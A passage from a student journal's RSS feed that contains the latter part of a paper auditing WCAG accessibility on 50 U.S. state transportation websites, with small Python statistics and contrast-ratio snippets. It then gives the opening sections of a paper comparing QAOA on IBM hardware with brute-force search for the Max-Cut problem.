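<pre class="wp-block-code"><code>from sklearn.metrics import cohen_kappa_score

# Made-up codes from two independent coders on the same ten sites
coder_a = ["legibility", "clutter", "structure", "legibility", "clutter",
           "structure", "clutter", "legibility", "structure", "clutter"]
coder_b = ["legibility", "clutter", "structure", "clutter", "clutter",
           "structure", "clutter", "legibility", "legibility", "clutter"]

kappa = cohen_kappa_score(coder_a, coder_b)
print(f"Cohen's kappa: {kappa:.2f}")  # study threshold for agreement: 0.75</code></pre>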



<p>To strengthen internal validity, a post hoc subset of ten websites underwent manual WCAG checklist testing focused on success criteria most frequently implicated in the automated findings, including 1.4.3 (Contrast), 1.3.1 (Info and Relationships), and 2.1.1 (Keyboard Navigation) (W3C, 2024). These manual checks were paired with basic task-based tests, such as locating renewal information or road closures using keyboard-only navigation, to evaluate whether the issues flagged by automation corresponded to tangible usability barriers.</p>



<p>Several limitations accompany this methodology. First, analyzing only two pages per website constrains the ability to generalize findings across entire sites. The decision to do so reflects a necessary balance between breadth, covering all fifty states, and depth, though future research should expand to include deeper navigational flows and internal task pages. Second, automated tools typically detect only 30 to 40 percent of accessibility violations, as many issues, such as reading order, focus visibility, and contextual link meaning, require human interpretation. Although manual validation and qualitative review were used to mitigate this limitation, undetected errors may remain. Third, while inter-rater reliability was established on a subset of sites, qualitative interpretation beyond that sample may still contain subjectivity. Additionally, because Department of Transportation websites frequently update banners, alerts, and layouts, the results represent a snapshot of accessibility performance at a single point in time. Lastly, the findings are partially shaped by Skynet’s proprietary detection algorithms, meaning results could vary with alternative auditing platforms. Despite these constraints, the combined quantitative and qualitative approach offers a robust, reproducible framework for assessing both technical accessibility and user-centered design quality across large-scale public web infrastructure.</p>



<h2 class="wp-block-heading"><strong>Results</strong></h2>



<p>One of the most revealing findings in our audit was the wide variation in accessibility compliance across the 50 U.S. State Department of Transportation websites. Overall compliance scores ranged from 14.7 percent (Kansas) to 94.8 percent (Ohio), with a mean of 68.9 percent, a median of 70.4 percent, and a standard deviation of 16.2. This range indicates substantial disparity in digital accessibility across states. While a small subset of websites exceeded 90 percent compliance, suggesting strong alignment with WCAG 2.2 standards, nearly half of the states fell below 70 percent, placing them in the semi-compliant or noncompliant category. These findings underscore that accessibility is not being uniformly prioritized, even though these websites serve as primary entry points to essential public services.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="672" src="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.48.58-PM-1024x672.png" alt="" class="wp-image-4635" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.48.58-PM-1024x672.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.48.58-PM-300x197.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.48.58-PM-768x504.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.48.58-PM-1536x1008.png 1536w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.48.58-PM-1000x656.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.48.58-PM-230x151.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.48.58-PM-350x230.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.48.58-PM-480x315.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.48.58-PM.png 1700w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>In tandem with compliance percentages, the total number of failed checks per site provided further insight into accessibility gaps. Across all 50 websites, the number of failures ranged from 7 to 33, with a mean of 18.5, a median of 17, and a standard deviation of 6.3. A Pearson correlation analysis between the compliance percentage and number of failed checks revealed a strong negative relationship (r = –0.87), indicating that lower compliance percentages were closely associated with higher counts of accessibility violations. This confirms that automated scoring aligned with practical accessibility performance: as the number of failures increased, overall compliance predictably declined.</p>
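<p>For readers who wish to reproduce this kind of analysis, the correlation can be computed in a few lines with SciPy. The arrays below are placeholders, not the study&#8217;s 50-state dataset.</p>

<pre class="wp-block-code"><code>import numpy as np
from scipy.stats import pearsonr

# Placeholder data (not the study's dataset):
# compliance percentage and failed-check count per state
compliance = np.array([94.8, 70.4, 62.1, 45.3, 14.7])
failed_checks = np.array([7, 15, 19, 26, 33])

r, p_value = pearsonr(compliance, failed_checks)
print(f"Pearson r = {r:.2f} (p = {p_value:.3f})")
# The study reports r = -0.87 across all 50 states.</code></pre>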



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="631" src="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.49.47-PM-1024x631.png" alt="" class="wp-image-4636" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.49.47-PM-1024x631.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.49.47-PM-300x185.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.49.47-PM-768x473.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.49.47-PM-1536x947.png 1536w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.49.47-PM-1000x616.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.49.47-PM-230x142.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.49.47-PM-350x216.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.49.47-PM-480x296.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.49.47-PM.png 1746w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Across all sites, the most frequent accessibility failures involved poor color contrast, unlabeled form elements, missing alternative text, and improperly structured headings. Color contrast errors were the single most common issue, appearing on 88 percent of audited pages. These problems most directly affect users with visual impairments, who comprised the most impacted disability category according to tool classification data. Users with mobility impairments were also frequently affected, particularly when keyboard-only navigation failed or focus indicators were missing from interactive elements. Cognitive accessibility issues appeared less frequently, though dense text structures and inconsistent navigation patterns created additional barriers for some users.</p>
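<p>Color contrast, the most common failure category, has a precise numerical definition in WCAG: the contrast ratio between two colors is (L1 + 0.05) / (L2 + 0.05), where L1 and L2 are the lighter and darker relative luminances. A self-contained check following the WCAG 2.x formula might look like the sketch below.</p>

<pre class="wp-block-code"><code>def relative_luminance(rgb):
    """WCAG relative luminance for an (R, G, B) tuple with 0-255 channels."""
    def channel(c):
        c = c / 255.0
        return c / 12.92 if c &lt;= 0.03928 else ((c + 0.055) / 1.055) ** 2.4
    r, g, b = (channel(c) for c in rgb)
    return 0.2126 * r + 0.7152 * g + 0.0722 * b

def contrast_ratio(foreground, background):
    """WCAG contrast ratio: (lighter + 0.05) / (darker + 0.05)."""
    l1, l2 = sorted((relative_luminance(foreground),
                     relative_luminance(background)), reverse=True)
    return (l1 + 0.05) / (l2 + 0.05)

# WCAG 2.x level AA requires at least 4.5:1 for normal-size body text
print(round(contrast_ratio((119, 119, 119), (255, 255, 255)), 2))  # 4.48, fails AA</code></pre>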



<p>Qualitative analysis reinforced these quantitative findings. One of the most pervasive design flaws observed was the use of semi-transparent images layered behind text or interactive elements. Over half of the websites used banners or background visuals that reduced text readability, particularly in combination with low-contrast color palettes. While intended to enhance visual appeal, these choices often compromised functional accessibility for users with low vision or reading impairments. This tension between aesthetic branding and practical usability reflects a broader misalignment between design intent and user inclusion.</p>



<p>A second major qualitative issue involved ADA compliance statements. Nearly all websites included a footer or dedicated page declaring adherence to the Americans with Disabilities Act or referencing WCAG standards. However, in many cases, these declarations did not correspond with actual usability. Unlabeled navigation links, inaccessible PDFs, and missing screen reader compatibility persisted despite such statements. This disconnect suggests that accessibility is too often treated as a formal requirement rather than an integrated design value.</p>



<p>Lastly, a large proportion of websites displayed visually and structurally outdated layouts, characterized by retro web design features such as bold color palettes, dense typography, pixel-style graphics, and nonresponsive navigation. These stylistic elements, reminiscent of early 2000s web design, were common among low-performing states and corresponded with lower compliance scores. Although such designs do not directly violate WCAG standards, they undermine usability by reducing clarity, scalability, and modern functionality. The persistence of these outdated designs indicates a lack of investment in modernization and highlights how institutional neglect can perpetuate digital inequity.</p>



<p>Taken together, these quantitative and qualitative results suggest that accessibility performance across U.S. State Department of Transportation websites varies widely and follows clear patterns. The strong negative relationship between compliance scores and failure counts reinforces that many accessibility problems are structural rather than incidental. The recurring qualitative trends (visual obstruction, performative ADA compliance, and outdated design) further reveal that technical adherence alone is insufficient. Accessibility, when treated as a checklist rather than a design ethic, continues to fall short of ensuring equitable digital access.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="455" src="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-9.00.55-PM-1024x455.png" alt="" class="wp-image-4637" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-9.00.55-PM-1024x455.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-9.00.55-PM-300x133.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-9.00.55-PM-768x341.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-9.00.55-PM-1536x682.png 1536w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-9.00.55-PM-1000x444.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-9.00.55-PM-230x102.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-9.00.55-PM-350x155.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-9.00.55-PM-480x213.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-9.00.55-PM.png 1676w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h2 class="wp-block-heading"><strong>Discussion</strong></h2>



<p>The results of this study highlight that digital accessibility must be treated as a core design priority rather than an afterthought. One of the most revealing findings was the percentage of accessibility checks passed across the 50 U.S. State Department of Transportation websites, which provided a general benchmark of compliance with WCAG 2.2 standards. While a handful of states achieved high compliance (above 90%), a significant portion scored well below that, often in the 60–70% range, placing them in the semi-compliant category, and a few even dipped below 50%, indicating a severe lack of attention to accessibility.</p>



<p>This inconsistency underscores that accessibility is not being uniformly prioritized, even though these websites serve as primary entry points to essential public services. While automated tools can flag compliance issues, many of the most disruptive problems, like the qualitative issues we observed, stem from broader design decisions that prioritize aesthetics or legacy structures over usability. This suggests that accessibility must be embedded into the design process from the beginning, with thoughtful attention to how content is visually presented, navigated, and interacted with across diverse user needs. Designers and developers should move beyond minimal compliance and adopt inclusive design practices that address both technical standards and real-world user experiences.</p>



<p>The findings also connect to broader discussions of digital inequality. Accessibility gaps on government websites do not merely represent technical oversights; they reinforce existing disparities in civic participation, mobility, and access to information. When people with disabilities cannot easily navigate transportation websites, they face compounded barriers to employment, healthcare, and education. These inequities mirror a larger pattern in digital governance where technological design choices can either expand or restrict public inclusion. Addressing accessibility, therefore, is not only about fixing websites but about ensuring that digital infrastructure functions as a public good that serves all users equitably.</p>



<p>Moreover, the gap between stated ADA compliance and actual usability points to the need for more transparent, user-centered workflows in public sector web development. Merely posting accessibility statements does little if sites remain functionally inaccessible. Agencies should incorporate routine manual audits, iterative usability testing with individuals with disabilities, and continuous training for design teams to better understand accessibility beyond code-level fixes. This also calls for inter-agency collaboration and standardization efforts that can ensure consistency across states, reducing the accessibility divide.</p>



<p>From a policy perspective, these findings suggest several actionable steps. State and federal agencies should establish standardized accessibility benchmarks for all government websites, accompanied by annual reporting and public accountability mechanisms. Accessibility audits should be integrated into procurement and design contracts, ensuring compliance from the earliest stages of development. Federal oversight could also incentivize interagency collaboration through shared design systems and centralized accessibility resources, reducing redundancy and improving consistency across states. Finally, accessibility should be framed not just as a compliance goal but as a measure of digital equity, directly tied to broader civil rights objectives and inclusive governance.</p>



<p>Ultimately, digital accessibility should be treated not only as a legal and technical requirement but as a moral and civic responsibility, essential to building equitable public services. By viewing accessibility through the lens of digital inequality and embedding it within public policy and design practice, governments can move closer to realizing the promise of technology as a tool for inclusion rather than exclusion.</p>



<h2 class="wp-block-heading"><strong>Conclusions</strong></h2>



<p>In conclusion, this study reveals that while some U.S. State Department of Transportation websites demonstrate meaningful progress toward digital accessibility, the majority fall short of providing equitable, user-centered online experiences for people with disabilities. Through both quantitative data and qualitative observations, we found a persistent disconnect between stated ADA compliance and actual usability, with recurring issues that disproportionately affect users with visual, mobility, and cognitive impairments. These findings underscore the need for accessibility to be fully integrated into the design and development lifecycle of public websites as a foundational principle of inclusive governance. As digital access becomes increasingly central to civic participation and public service delivery, state agencies must recognize accessibility as both a civil rights imperative and a design obligation, so that all citizens can navigate, interact with, and benefit from the digital infrastructure that supports everyday life.</p>



<h2 class="wp-block-heading"><strong>Bibliography</strong></h2>



<p><em>Accessibility in Design &#8211; Definition and Explanation</em>. (2024, June 10). The Oxford Review &#8211; or Briefings. https://oxford-review.com/the-oxford-review-dei-diversity-equity-and-inclusion-dictionary/accessibility-in-design-definition-and-explanation/</p>



<p>Acosta-Vargas, P., Lujan-Mora, S., &amp; Salvador-Ullauri, L. (2017). Quality evaluation of government websites. <em>2017 Fourth International Conference on EDemocracy &amp;</em> <em>EGovernment (ICEDEG)</em>. https://doi.org/10.1109/icedeg.2017.7962507</p>



<p>ADA National Network. (n.d.). <em>What is the Americans with Disabilities Act (ADA)?</em> ADA National Network. https://adata.org/learn-about-ada</p>



<p>CDC. (2020). <em>Centers for Disease Control and Prevention</em>. Centers for Disease Control and Prevention; CDC. https://www.cdc.gov</p>



<p>Currie, G., &amp; Gook, M. (2009). Measuring the Performance of Transit Passenger Information Websites. <em>Transportation Research Record: Journal of the Transportation Research</em> <em>Board</em>, <em>2110</em>(1), 137–148. https://doi.org/10.3141/2110-17</p>



<p>Gibson, D. (2024, November 8). <em>2024 WCAG &amp; ADA Website Compliance Requirements |</em> <em>Accessibility.Works</em>. Accessibility.works. https://www.accessibility.works/blog/2025-wcag-ada-website-compliance-standards-requirements/</p>



<p>Goode, L. F. (2021, March 8). <em>About | HeinOnline</em>. HeinOnline. https://heinonline.org/HOL/LandingPage?handle=hein.journals/hlelj38&amp;div=8&amp;id=&amp;page=.</p>



<p>Olalere, A., &amp; Lazar, J. (2011). Accessibility of U.S. federal government home pages: Section 508 compliance and site accessibility statements. <em>Government Information Quarterly</em>, <em>28</em>(3), 303–309. https://doi.org/10.1016/j.giq.2011.02.002</p>



<p>Seattle SEO Company. (2022, April 16). <em>Retro Web Design</em>. Seattle Web Design &amp; SEO Agency; Seattle Web Design Agency. https://visualwebz.com/retro-web-design/</p>



<p>U.S. Department of Transportation. (2019). <em>State Transportation Web Sites | Federal Highway Administration</em>. Dot.gov. https://www.fhwa.dot.gov/about/webstate.cfm</p>



<p>USAgov. (2019). <em>Official Guide to Government Information and Services | USAGov</em>. Usa.gov. <a href="https://www.usa.gov">https://www.usa.gov</a></p>



<p>W3C. (2019). <em>World Wide Web Consortium (W3C)</em>. W3.org. https://www.w3.org</p>



<p>W3C. (2024, December 12). <em>Web Content Accessibility Guidelines (WCAG) Overview</em>. Web Accessibility Initiative (WAI). https://www.w3.org/WAI/standards-guidelines/wcag/</p>



<p>Wagner, M., Manish Shirgaokar, Misra, A., &amp; Marshall, W. (2024). Navigating ADA Compliance. <em>Journal of the American Planning Association</em>, 1–18. https://doi.org/10.1080/01944363.2024.2343661</p>



<p></p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://exploratiojournal.com/wp-content/uploads/2025/11/imageedit_1_4882057431.jpg" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Aashi Agarwal
</h5><p>Aashi Agarwal is a designer, accessibility advocate, and creative leader passionate about the intersection of technology, communication, and inclusion. She specializes in human-centered design and digital accessibility, developing tools and platforms that make information and interaction more equitable. Her work with organizations such as the NIMBLE Mindset has focused on translating complex data into intuitive, interactive storytelling that highlights impact and community. Aashi also explores how inclusive design principles can extend beyond digital interfaces into cultural and artistic spaces.</p><p> In her leadership role within the performing arts community, she has spearheaded initiatives to expand access to live theatre, including implementing ASL interpretation and inclusive audience design practices for school productions, and developing programs that welcome and support diverse participants. She aims to continue bridging the gap between structure and creativity to design systems that empower diverse voices and create meaningful, accessible experiences for all users.
</p></figure></div>



<p></p>
<p>The post <a href="https://exploratiojournal.com/roadblocks-to-digital-access-accessibility-and-design-gaps-in-50-state-department-of-transportation-websites/">Roadblocks to Digital Access: Accessibility and Design Gaps in 50 State Department of Transportation Websites</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Quantum Approximate Optimization Algorithm for the Max-Cut Problem: Performance Comparison with Classical Approaches on NISQ Devices</title>
		<link>https://exploratiojournal.com/quantum-approximate-optimization-algorithm-for-the-max-cut-problem-performance-comparison-with-classical-approaches-on-nisq-devices/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=quantum-approximate-optimization-algorithm-for-the-max-cut-problem-performance-comparison-with-classical-approaches-on-nisq-devices</link>
		
		<dc:creator><![CDATA[Yohhaan Yung Kang Huang]]></dc:creator>
		<pubDate>Tue, 28 Oct 2025 10:32:35 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<guid isPermaLink="false">https://exploratiojournal.com/?p=4578</guid>

					<description><![CDATA[<p>Yohhaan Yung Kang Huang<br />
The Village School</p>
<p>The post <a href="https://exploratiojournal.com/quantum-approximate-optimization-algorithm-for-the-max-cut-problem-performance-comparison-with-classical-approaches-on-nisq-devices/">Quantum Approximate Optimization Algorithm for the Max-Cut Problem: Performance Comparison with Classical Approaches on NISQ Devices</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="937" height="937" src="https://exploratiojournal.com/wp-content/uploads/2025/10/yohhaan-headshot.jpg" alt="" class="wp-image-4579 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/yohhaan-headshot.jpg 937w, https://exploratiojournal.com/wp-content/uploads/2025/10/yohhaan-headshot-300x300.jpg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/yohhaan-headshot-150x150.jpg 150w, https://exploratiojournal.com/wp-content/uploads/2025/10/yohhaan-headshot-768x768.jpg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/yohhaan-headshot-230x230.jpg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/yohhaan-headshot-350x350.jpg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/yohhaan-headshot-480x480.jpg 480w" sizes="(max-width: 937px) 100vw, 937px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author:</strong> Yohhaan Yung Kang Huang<br><strong>Mentor</strong>: Dr. Roberto Dos Reis<br><em>The Village School</em></p>
</div></div>



<h2 class="wp-block-heading"><strong>Abstract</strong></h2>



<p>The Max-Cut problem is a foundational NP-hard combinatorial optimization problem with applications in areas such as circuit and semiconductor design, financial modeling, and data flow optimization. Because its solution space grows exponentially with input size, exact solutions become infeasible for classical algorithms on large inputs, making the problem a natural benchmark for alternative methods such as quantum computing.</p>



<p>While the Quantum Approximate Optimization Algorithm (QAOA) has shown theoretical promise for solving such problems, the practical threshold at which quantum approaches outperform classical methods on real noisy intermediate-scale quantum (NISQ) devices remains unclear. This paper aims to resolve that uncertainty. The investigation compares the performance of QAOA for the Max-Cut problem, executed on IBM&#8217;s 133-qubit Torino quantum processor, against the classical brute-force method in order to gauge the potential advantage that quantum algorithms may provide as input size grows. It consists of running both algorithms on (unweighted) graphs ranging from 4 to 24 nodes, with 5 independent trials each, measuring both execution time and approximation ratio. The QAOA implementation uses a circuit with a single fixed depth and fixed Hamiltonian parameters to ensure consistency across all trials and fairness in comparisons between graph sizes; however, this restriction, together with hardware noise, means the optimal cut is produced only with low probability.</p>



<p>The classical solver exhaustively evaluated all 2<sup>n</sup> possible partitions to produce the optimal cut value. Classical execution time grew exponentially, from 0.16 milliseconds (4 nodes) to 87.6 seconds (24 nodes), consistent with the brute-force algorithm&#8217;s behavior. QAOA, on the other hand, maintained near-constant execution time (~1.33 seconds across all graph sizes), with the two methods&#8217; execution times converging at approximately 19 nodes. However, QAOA&#8217;s approximation ratio declined from 0.95 (4 nodes) to 0.52 (24 nodes), reflecting the limitations of shallow circuit depth and hardware noise. These findings demonstrate that QAOA scales better than exact classical methods as graph size increases, but that on current NISQ hardware this scalability comes at the cost of accuracy, precisely at the large graph sizes where the method would be most practical. As quantum hardware advances, higher circuit depths with lower noise, and eventually error correction, are expected to strengthen algorithms like QAOA substantially, allowing their theoretical advantages to be realized to the fullest on NP-hard problems like Max-Cut.</p>



<p><em><strong>Key words</strong>:  compare, evaluate, execution time, approximation accuracy, scalability</em></p>



<h2 class="wp-block-heading"><strong>Introduction</strong></h2>



<h4 class="wp-block-heading"><strong>Optimization</strong></h4>



<p>In mathematics and computer science, optimization is a process that involves finding the best solution from the search space according to some defined criteria, while following certain rules/constraints according to the problem situation (Wright, 2025).&nbsp;</p>



<p>The search space, in the context of optimization, refers to the set of all possible solutions that adhere to the problem&#8217;s constraints or objectives. It thus represents the feasible solutions that can be evaluated to find the optimal one according to the objective function (Wright, 2025). The objective function is a mathematical expression that defines the goal of an optimization problem, usually to maximize or minimize some quantity; it quantifies the desired outcome, serving as a guide for decision making and showing how close a solution is to the desired one (Fiveable, n.d.).</p>



<h4 class="wp-block-heading"><strong>Combinatorial Optimization</strong></h4>



<p>Combinatorial optimization is a type of discrete optimization that refers to problems on discrete structures such as graphs. It aims to find the best or optimal solution to problems that have a finite set of possible solutions (discrete search space), and the best solution is usually the one that minimizes or maximizes the problem&#8217;s objective function (Lee, 2010; DeepAI, n.d.).</p>



<p>For each combinatorial optimization problem, there is a decision problem, which, in simple terms, is a yes/no version of it. It asks whether there is a feasible solution to the problem relative to some measurement threshold (Jaillet, 2010). For instance, given 10 interconnected cities, the optimization problem would be to find the shortest path from city a to city b. A corresponding decision problem would be to determine whether or not there is a path from city a to city b that passes through at most 5 intermediate cities.</p>



<p>Due to the nature of decision problems, if the decision problem can be answered affirmatively, then a solution exists that satisfies all the constraints of the problem, and the corresponding optimization problem is &#8216;feasible&#8217;. If it cannot, the corresponding optimization problem is &#8216;infeasible&#8217;: no solution satisfies all of its constraints. Even if a problem is feasible, it may not necessarily be &#8216;bounded&#8217;; that is, there may be no limit to how &#8220;good&#8221; or &#8220;optimal&#8221; the solution can get for the objective function. Thus, if an optimization problem is neither infeasible nor unbounded, it must have an optimal solution and is therefore solvable (Maltby &amp; Ross, n.d.).</p>



<h2 class="wp-block-heading"><strong>The Max-Cut Problem</strong></h2>



<p>Now that discrete optimization and combinatorial optimization have been made clear, it is appropriate to visit the &#8216;Max-Cut Problem&#8217;, a famous example of combinatorial optimization and the focus of this paper.</p>



<p>Let there be a graph G = (V, E) with vertices V and edges E. A graph in this context refers to a set of vertices (nodes), which are mathematical abstractions corresponding to objects associated with each other by some criterion, connected to one another by a set of edges E, each of which joins two nodes (Luca, 2023). Let there be a partition that divides the set V into two disjoint sets of vertices, A and B. An edge is said to be &#8220;cut&#8221; by the partition if it connects two vertices that are not in the same set. The objective of the Max-Cut problem is thus to find a partition of the vertices V into complementary subsets A and B of graph G that maximizes the number of edges between them (Goemans &amp; Williamson, 1995). An example is shown in the figure below.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="902" height="460" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-33.png" alt="" class="wp-image-4581" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-33.png 902w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-33-300x153.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-33-768x392.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-33-230x117.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-33-350x178.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-33-480x245.png 480w" sizes="(max-width: 902px) 100vw, 902px" /></figure>



<p>In the figure above, the image on the left shows the original graph with its set of nodes and edges. The image in the center places nodes 0 and 1 in the red set and nodes 2 and 3 in the blue set, and shows the cuts obtained with that particular set distribution, which is 3 cuts (not the maximum). The image on the right shows the set distribution that gives the maximum number of cuts for this graph, which is 4 cuts: nodes 1 and 2 in the red set and nodes 0 and 3 in the blue set. It is important to note that swapping the sets, placing nodes 0 and 3 in the red set and nodes 1 and 2 in the blue set, gives the same result, because the edges that are &#8220;cut&#8221; still connect nodes in different sets, which is all that matters. Note that all explorations of the Max-Cut problem in this paper deal with unweighted graphs; the concept of edge weight is ignored entirely.</p>



<p>When checking whether the Max-Cut problem is solvable for all input sizes, it is first necessary to assess its feasibility. To do so, consider the decision version of the problem: given a graph G and an integer k, determine whether there is a cut of value at least k (Goemans &amp; Williamson, 1995). It is indeed possible to have a cut of some value. Take the example in Fig. 1: let k equal 3; on the graph in the middle, a cut value of at least 3 is indeed achieved. Thus, as the decision version can be answered affirmatively, the Max-Cut problem is feasible. Lastly, it is necessary to assess its boundedness. As the name suggests, the Max-Cut problem must have a maximum possible cut value for any specific graph. Take the example in Fig. 1 once more: the graph on the right side of the figure shows the maximum possible cut value for the given graph. If two nodes of the same set are adjacent to one another, the maximum possible cut value is 3, as shown by the graph in the middle; but if same-set nodes are placed opposite each other, as shown by the graph on the right, each node along the rectangular portion of the graph (excluding the diagonal, the edge between node 0 and node 3) is connected to a node of the opposite set, maximizing the cut value for the given graph at 4. More generally, the cut value of any partition can never exceed the total number of edges, so a maximum cut value must exist for every graph with any number of vertices and combination of edges. This shows that the Max-Cut problem is bounded. Therefore, as it is both feasible and bounded, it is solvable.</p>



<p>Although the objective of the Max-Cut problem may seem straightforward, no solution has been developed that can find the optimal answer efficiently in all cases, due to the nature of the problem statement, the limits of modern hardware, and scalability issues. Consequently, various approximation algorithms have been created to deliver suboptimal solutions, and quite a few of them utilize principles of quantum mechanics to do so, which allow parallel computation: the ability to evaluate multiple possibilities at once. Each additional qubit doubles the number of representable basis states, giving quantum computers the potential to solve certain problems exponentially faster than classical algorithms (Tepanyan, 2025). A few classical approximation algorithms that have had sufficient success in approximating the Max-Cut problem are those using &#8216;greedy algorithms&#8217; (Codecademy, 2022) and the &#8216;Goemans-Williamson Algorithm&#8217; (Toni, 2018). However, these are not as effective as quantum algorithms, such as those using the &#8216;Quantum Approximate Optimization Algorithm&#8217; (QAOA) (Ceroni, 2025) and Quantum Genetic Algorithms (QGA) (Viana &amp; Neto, 2024).</p>



<p>As mentioned in the previous paragraph, both classical and quantum approximation algorithms have made progress in addressing the Max-Cut problem, but their effectiveness in practice depends heavily on the underlying hardware and the scalability of the method used. This raises an important question: when do quantum algorithms outperform their classical counterparts? Addressing this question motivates the main objectives of this paper. Specifically, we aim to explore and demonstrate the feasibility of running QAOA for the Max-Cut problem on real quantum devices and to compare its performance against the classical brute-force method (AlgoEducation, n.d.) in order to gauge the potential advantage that quantum algorithms may provide as input size grows.</p>



<p>Our work is driven by the hypothesis that while classical algorithms excel at solving small to medium-sized problem instances with a great degree of efficiency, they become infeasible for large problems, and that quantum approaches, such as QAOA, have the potential to surpass them as the input size increases.</p>



<h2 class="wp-block-heading"><strong>Background – Classical vs. Quantum Approaches</strong></h2>



<h4 class="wp-block-heading"><strong>Computational Complexity</strong></h4>



<p>To understand why quantum solutions can be superior to classical solutions, it is imperative to understand why classical solutions can fail, which requires some knowledge of computational complexity. Computational complexity is a measure of how difficult a computational problem is and how much time is required to solve it. The Max-Cut problem, specifically, is an &#8216;NP-Hard&#8217; problem.</p>



<p>For a problem in &#8216;NP&#8217;, a proposed solution can be verified in polynomial time, but it is not known whether the solution itself can be found as quickly. Examples of NP problems are the &#8216;Boolean Satisfiability Problem&#8217; (SAT) and the Sudoku puzzle (Kanwal, 2021).</p>



<p>A problem is ‘NP-Hard’ if every problem in NP can be reduced to it in polynomial time, that is, if an NP-Hard problem can be solved efficiently (in polynomial time), all NP problems can be solved efficiently (Kanwal, 2021). In fact, quite a few NP-Hard problems are not even in NP because their solutions cannot be verified in polynomial time.</p>



<p>The Max-Cut problem, or at least its optimization version, is NP-Hard for two reasons. First, while it is possible to count the edges cut by a given partition, it is not possible in general to verify that a certain partition of the vertices in set V gives the maximum cut without essentially solving the problem itself. Second, as the number of vertices increases linearly, the number of possible partitions increases exponentially, which is why no polynomial-time exact algorithm is known for the Max-Cut problem.</p>



<h4 class="wp-block-heading"><strong>Classical Solutions to the Max-Cut Problem</strong></h4>



